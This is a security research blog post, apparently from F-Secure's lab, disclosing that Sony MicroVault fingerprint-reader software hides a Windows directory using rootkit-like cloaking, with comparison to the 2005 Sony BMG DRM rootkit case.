Many of our regular readers will remember the huge Sony BMG XCP DRM rootkit debacle of 2005. Back then malware with rootkits were not very common but since then a lot of malware families have adopted rootkit cloaking techniques. It is unclear if the "rise of the rootkit" would have happened in this magnitude without the publicity of the Sony BMG case. In any case, a lot more people now know what a "rootkit" is than back then.
This USB stick with rootkit-like behavior is closely related to the Sony BMG case. First of all, it is another case where rootkit-like cloaking is ill advisedly used in commercial software. Also, the USB sticks we ordered are products of the same company — Sony Corporation.

The Sony MicroVault USM-F fingerprint reader software that comes with the USB stick installs a driver that is hiding a directory under "c:\windows\". So, when enumerating files and subdirectories in the Windows directory, the directory and files inside it are not visible through Windows API. If you know the name of the directory, it is e.g. possible to enter the hidden directory using Command Prompt and it is possible to create new hidden files. There are also ways to run files from this directory. Files in this directory are also hidden from some antivirus scanners (as with the Sony BMG DRM case) — depending on the techniques employed by the antivirus software. It is therefore technically possible for malware to use the hidden directory as a hiding place.
In addition to the software that was packaged with the USB stick, we also tested the latest software version available from Sony at www.sony.net/Products/Media/Microvault/ and this version also contains the same hiding functionality.

It is our belief that the MicroVault software hides this folder to somehow protect the fingerprint authentication from tampering and bypass. It is obvious that user fingerprints cannot be in a world writable file on the disk when we are talking about secure authentication. However, we feel that rootkit-like cloaking techniques are not the right way to go here. As with the Sony BMG case we, of course, contacted Sony before we decided to go public with the case. However, this time we received no reply from them.

It should be noted that MicroVaults with fingerprint authentication appear to be an older product and may no longer be manufactured. At least we had some trouble finding a reader of this type in Helsinki. Nevertheless, we did manage to find them on sale.
Note that over the weekend there was news about a suspected rootkit in the PC version of the game Bioshock. This news proved not to be true, but since BioShock apparently uses copyright protection software made by Sony there was lots of initial commotion.

Source: F-Secure : News from the Lab